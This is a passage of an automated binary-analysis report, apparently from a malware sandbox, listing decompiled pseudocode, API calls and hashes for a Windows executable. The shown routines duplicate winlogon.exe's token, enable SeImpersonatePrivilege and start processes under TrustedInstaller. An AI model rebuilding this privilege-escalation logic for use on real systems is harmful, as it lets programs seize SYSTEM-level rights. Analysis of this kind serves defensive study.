                                                                                                  					_v1076 = 0;
                                                                                                  					memset( &_v1074, 0, 0x208);
                                                                                                  					E00404C3C( &_v548);
                                                                                                  					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                                  					_t151 = wcslen(??);
                                                                                                  					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                                  					_t159 = _t151 + _t10 - 0x104;
                                                                                                  					if(_t151 + _t10 >= 0x104) {
                                                                                                  						_v1076 = 0;
                                                                                                  					} else {
                                                                                                  						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                                  					}
                                                                                                  					_v8 = 0;
                                                                                                  					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                                  					L14:
                                                                                                  					_t160 = _t105;
                                                                                                  					_v12 = _t105;
                                                                                                  					L15:
                                                                                                  					if(_t160 == 0) {
                                                                                                  						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                                  							_v12 = GetLastError();
                                                                                                  						}
                                                                                                  						CloseHandle(_v8);
                                                                                                  					}
                                                                                                  					L44:
                                                                                                  					return _v12;
                                                                                                  				}
                                                                                                  			}


































                                                                                                  0x00401fe6
                                                                                                  0x00401ff1
                                                                                                  0x00401ff3
                                                                                                  0x00401fff
                                                                                                  0x00402002
                                                                                                  0x004020a8
                                                                                                  0x004020ab
                                                                                                  0x004020f3
                                                                                                  0x004020f6
                                                                                                  0x00402162
                                                                                                  0x00402165
                                                                                                  0x004021f2
                                                                                                  0x004021f5
                                                                                                  0x00402235
                                                                                                  0x00402238
                                                                                                  0x004022be
                                                                                                  0x0040223a
                                                                                                  0x0040223a
                                                                                                  0x00402240
                                                                                                  0x0040224b
                                                                                                  0x0040224e
                                                                                                  0x00402251
                                                                                                  0x00402254
                                                                                                  0x00402259
                                                                                                  0x0040225e
                                                                                                  0x00402262
                                                                                                  0x00402264
                                                                                                  0x00402264
                                                                                                  0x00402264
                                                                                                  0x00402262
                                                                                                  0x00402266
                                                                                                  0x0040226c
                                                                                                  0x00402271
                                                                                                  0x00402274
                                                                                                  0x00402276
                                                                                                  0x0040229a
                                                                                                  0x0040229a
                                                                                                  0x00402278
                                                                                                  0x00402296
                                                                                                  0x00402296
                                                                                                  0x0040229c
                                                                                                  0x0040229c
                                                                                                  0x004022c0
                                                                                                  0x004022c2
                                                                                                  0x004022c8
                                                                                                  0x004022c8
                                                                                                  0x004022c8
                                                                                                  0x00000000
                                                                                                  0x004022c0
                                                                                                  0x00402201
                                                                                                  0x00402203
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402220
                                                                                                  0x00402225
                                                                                                  0x00402227
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040222d
                                                                                                  0x00000000
                                                                                                  0x0040222d
                                                                                                  0x00402173
                                                                                                  0x00402179
                                                                                                  0x0040217b
                                                                                                  0x0040217e
                                                                                                  0x00402183
                                                                                                  0x00402185
                                                                                                  0x00402188
                                                                                                  0x0040218d
                                                                                                  0x0040218f
                                                                                                  0x00402192
                                                                                                  0x004021a2
                                                                                                  0x004021a7
                                                                                                  0x004021a9
                                                                                                  0x004021ac
                                                                                                  0x004021cc
                                                                                                  0x004021d1
                                                                                                  0x004021d3
                                                                                                  0x004021db
                                                                                                  0x004021db
                                                                                                  0x004021e1
                                                                                                  0x004021e1
                                                                                                  0x004021e7
                                                                                                  0x004021e7
                                                                                                  0x00000000
                                                                                                  0x00402192
                                                                                                  0x004020fe
                                                                                                  0x00402103
                                                                                                  0x00402105
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402111
                                                                                                  0x00402114
                                                                                                  0x00000000
                                                                                                  0x00402114
                                                                                                  0x004020ad
                                                                                                  0x004020b4
                                                                                                  0x004020b9
                                                                                                  0x004020bc
                                                                                                  0x00000000
                                                                                                  0x004020c2
                                                                                                  0x004020c4
                                                                                                  0x004020ce
                                                                                                  0x004020d0
                                                                                                  0x004020d3
                                                                                                  0x004020d4
                                                                                                  0x004020d5
                                                                                                  0x004020e6
                                                                                                  0x004020e7
                                                                                                  0x004020d7
                                                                                                  0x004020d7
                                                                                                  0x004020dd
                                                                                                  0x004020de
                                                                                                  0x004020df
                                                                                                  0x004020df
                                                                                                  0x004020ec
                                                                                                  0x004020ef
                                                                                                  0x00000000
                                                                                                  0x004020ef
                                                                                                  0x00402008
                                                                                                  0x00402016
                                                                                                  0x0040201d
                                                                                                  0x0040202e
                                                                                                  0x00402035
                                                                                                  0x00402044
                                                                                                  0x00402049
                                                                                                  0x00402055
                                                                                                  0x00402064
                                                                                                  0x00402068
                                                                                                  0x0040206e
                                                                                                  0x0040208b
                                                                                                  0x00402070
                                                                                                  0x00402082
                                                                                                  0x00402088
                                                                                                  0x0040209e
                                                                                                  0x004020a1
                                                                                                  0x00402119
                                                                                                  0x00402119
                                                                                                  0x0040211b
                                                                                                  0x0040211e
                                                                                                  0x0040211e
                                                                                                  0x00402149
                                                                                                  0x00402151
                                                                                                  0x00402151
                                                                                                  0x00402157
                                                                                                  0x00402157
                                                                                                  0x004022cb
                                                                                                  0x004022d2
                                                                                                  0x004022d2

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040201D
                                                                                                  • memset.MSVCRT ref: 00402035
                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                  • wcslen.MSVCRT ref: 00402050
                                                                                                  • wcslen.MSVCRT ref: 0040205F
                                                                                                  • wcslen.MSVCRT ref: 004020B4
                                                                                                  • _wtoi.MSVCRT ref: 004020D7
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                  • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                  • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                    • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                    • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                    • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                    • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                    • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                    • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                    • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                    • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                  • wcschr.MSVCRT ref: 00402259
                                                                                                  • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                  • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                  • API String ID: 3201562063-2355939583
                                                                                                  • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                  • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                  • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                  • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409921(struct HINSTANCE__** __esi) {
                                                                                                  				void* _t6;
                                                                                                  				struct HINSTANCE__* _t7;
                                                                                                  				_Unknown_base(*)()* _t12;
                                                                                                  				CHAR* _t13;
                                                                                                  				intOrPtr* _t17;
                                                                                                  
                                                                                                  				if( *__esi == 0) {
                                                                                                  					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                                  					 *_t17 = "GetModuleBaseNameW";
                                                                                                  					 *__esi = _t7;
                                                                                                  					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                                  					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                  					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                  					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                  					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                  					__esi[3] = _t12;
                                                                                                  					return _t12;
                                                                                                  				}
                                                                                                  				return _t6;
                                                                                                  			}








                                                                                                  0x00409924
                                                                                                  0x0040992c
                                                                                                  0x00409937
                                                                                                  0x0040993f
                                                                                                  0x0040994a
                                                                                                  0x00409956
                                                                                                  0x00409962
                                                                                                  0x0040996e
                                                                                                  0x00409971
                                                                                                  0x00409973
                                                                                                  0x00000000
                                                                                                  0x00409976
                                                                                                  0x00409977

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                  • API String ID: 1529661771-70141382
                                                                                                  • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                  • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                  • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                  • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2827331108-0
                                                                                                  • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                  • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                  • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                  • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                                  				int _v8;
                                                                                                  				void _v538;
                                                                                                  				long _v540;
                                                                                                  				void _v1066;
                                                                                                  				char _v1068;
                                                                                                  				long _t30;
                                                                                                  				int _t33;
                                                                                                  				int _t39;
                                                                                                  				void* _t42;
                                                                                                  				void* _t45;
                                                                                                  				long _t49;
                                                                                                  
                                                                                                  				_t45 = __edx;
                                                                                                  				_v540 = 0;
                                                                                                  				memset( &_v538, 0, 0x208);
                                                                                                  				_v1068 = 0;
                                                                                                  				memset( &_v1066, 0, 0x208);
                                                                                                  				E00404C3C( &_v540);
                                                                                                  				_t48 = L"winlogon.exe";
                                                                                                  				_t39 = wcslen(L"winlogon.exe");
                                                                                                  				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                                  				_t53 = _t39 + _t8 - 0x104;
                                                                                                  				_pop(_t42);
                                                                                                  				if(_t39 + _t8 >= 0x104) {
                                                                                                  					_v1068 = 0;
                                                                                                  				} else {
                                                                                                  					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                                  					_pop(_t42);
                                                                                                  				}
                                                                                                  				_v8 = 0;
                                                                                                  				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                                  				_t49 = _t30;
                                                                                                  				_t54 = _t49;
                                                                                                  				if(_t49 == 0) {
                                                                                                  					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                                  					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                                  					if(_t33 == 0) {
                                                                                                  						_t49 = GetLastError();
                                                                                                  					}
                                                                                                  					CloseHandle(_v8);
                                                                                                  				}
                                                                                                  				return _t49;
                                                                                                  			}














                                                                                                  0x00401f04
                                                                                                  0x00401f20
                                                                                                  0x00401f27
                                                                                                  0x00401f38
                                                                                                  0x00401f3f
                                                                                                  0x00401f4e
                                                                                                  0x00401f54
                                                                                                  0x00401f5f
                                                                                                  0x00401f6e
                                                                                                  0x00401f72
                                                                                                  0x00401f77
                                                                                                  0x00401f78
                                                                                                  0x00401f91
                                                                                                  0x00401f7a
                                                                                                  0x00401f88
                                                                                                  0x00401f8e
                                                                                                  0x00401f8e
                                                                                                  0x00401fa6
                                                                                                  0x00401fa9
                                                                                                  0x00401fae
                                                                                                  0x00401fb0
                                                                                                  0x00401fb2
                                                                                                  0x00401fb9
                                                                                                  0x00401fc2
                                                                                                  0x00401fca
                                                                                                  0x00401fd2
                                                                                                  0x00401fd2
                                                                                                  0x00401fd7
                                                                                                  0x00401fd7
                                                                                                  0x00401fe3

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00401F27
                                                                                                  • memset.MSVCRT ref: 00401F3F
                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                  • wcslen.MSVCRT ref: 00401F5A
                                                                                                  • wcslen.MSVCRT ref: 00401F69
                                                                                                  • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                  • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                  • API String ID: 3867304300-2177360481
                                                                                                  • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                  • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                  • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                  • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                  				int _t8;
                                                                                                  				struct HINSTANCE__* _t9;
                                                                                                  
                                                                                                  				if( *0x41c8e8 == 0) {
                                                                                                  					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  					if(_t9 != 0) {
                                                                                                  						 *0x41c8e8 = 1;
                                                                                                  						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                  					}
                                                                                                  				}
                                                                                                  				if( *0x41c8ec == 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                  					return _t8;
                                                                                                  				}
                                                                                                  			}





                                                                                                  0x0040955f
                                                                                                  0x00409566
                                                                                                  0x0040956e
                                                                                                  0x00409576
                                                                                                  0x00409586
                                                                                                  0x00409586
                                                                                                  0x0040956e
                                                                                                  0x00409592
                                                                                                  0x004095aa
                                                                                                  0x00409594
                                                                                                  0x004095a3
                                                                                                  0x004095a6
                                                                                                  0x004095a6

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                  • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                  • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                  • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                  • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                  • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 84%
                                                                                                  			E00402F31(void* _a4) {
                                                                                                  				void _v530;
                                                                                                  				long _v532;
                                                                                                  				void* __edi;
                                                                                                  				wchar_t* _t15;
                                                                                                  				intOrPtr _t18;
                                                                                                  				short* _t19;
                                                                                                  				void* _t22;
                                                                                                  				void* _t29;
                                                                                                  
                                                                                                  				_v532 = _v532 & 0x00000000;
                                                                                                  				memset( &_v530, 0, 0x208);
                                                                                                  				E00404AD9( &_v532);
                                                                                                  				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                                  				if(_t15 != 0) {
                                                                                                  					 *_t15 =  *_t15 & 0x00000000;
                                                                                                  				}
                                                                                                  				wcscat( &_v532, L".cfg");
                                                                                                  				_t18 =  *0x40fa74; // 0x4101c8
                                                                                                  				_t19 = _t18 + 0x5504;
                                                                                                  				_t36 =  *_t19;
                                                                                                  				_pop(_t29);
                                                                                                  				if( *_t19 != 0) {
                                                                                                  					E00404923(0x104,  &_v532, _t19);
                                                                                                  					_pop(_t29);
                                                                                                  				}
                                                                                                  				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
                                                                                                  				return _t22;
                                                                                                  			}











                                                                                                  0x00402f3a
                                                                                                  0x00402f51
                                                                                                  0x00402f60
                                                                                                  0x00402f6f
                                                                                                  0x00402f78
                                                                                                  0x00402f7a
                                                                                                  0x00402f7a
                                                                                                  0x00402f8a
                                                                                                  0x00402f8f
                                                                                                  0x00402f94
                                                                                                  0x00402f99
                                                                                                  0x00402f9e
                                                                                                  0x00402f9f
                                                                                                  0x00402fad
                                                                                                  0x00402fb2
                                                                                                  0x00402fb2
                                                                                                  0x00402fbd
                                                                                                  0x00402fc5

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00402F51
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                  • wcscat.MSVCRT ref: 00402F8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                  • String ID: .cfg
                                                                                                  • API String ID: 776488737-3410578098
                                                                                                  • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                  • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                  • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                  • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 35%
                                                                                                  			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                  				char _v16390;
                                                                                                  				short _v16392;
                                                                                                  				void* __edi;
                                                                                                  				intOrPtr* _t30;
                                                                                                  				intOrPtr* _t34;
                                                                                                  				signed int _t36;
                                                                                                  				signed int _t37;
                                                                                                  
                                                                                                  				_t30 = __ecx;
                                                                                                  				E0040B550(0x4004, __ecx);
                                                                                                  				_push(0x4000);
                                                                                                  				_push(0);
                                                                                                  				_v16392 = 0;
                                                                                                  				_t34 = _t30;
                                                                                                  				_push( &_v16390);
                                                                                                  				if(_a4 == 0) {
                                                                                                  					memset();
                                                                                                  					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
                                                                                                  					asm("sbb esi, esi");
                                                                                                  					_t37 =  ~_t36;
                                                                                                  					E004051B8( &_v16392, _t34, _a16);
                                                                                                  				} else {
                                                                                                  					memset();
                                                                                                  					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                                  					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                  				}
                                                                                                  				return _t37;
                                                                                                  			}










                                                                                                  0x00409ddc
                                                                                                  0x00409de4
                                                                                                  0x00409df0
                                                                                                  0x00409df5
                                                                                                  0x00409df6
                                                                                                  0x00409e03
                                                                                                  0x00409e05
                                                                                                  0x00409e06
                                                                                                  0x00409e3b
                                                                                                  0x00409e5d
                                                                                                  0x00409e6a
                                                                                                  0x00409e73
                                                                                                  0x00409e75
                                                                                                  0x00409e08
                                                                                                  0x00409e08
                                                                                                  0x00409e19
                                                                                                  0x00409e37
                                                                                                  0x00409e37
                                                                                                  0x00409e81

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00409E08
                                                                                                    • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                    • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                  • memset.MSVCRT ref: 00409E3B
                                                                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1127616056-0
                                                                                                  • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                  • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                  • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                  • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                  				void* _t8;
                                                                                                  				void* _t13;
                                                                                                  				signed int _t16;
                                                                                                  				void** _t21;
                                                                                                  				signed int _t22;
                                                                                                  
                                                                                                  				_t21 = __edi;
                                                                                                  				_t22 =  *__eax;
                                                                                                  				if(__edx < _t22) {
                                                                                                  					return 0;
                                                                                                  				} else {
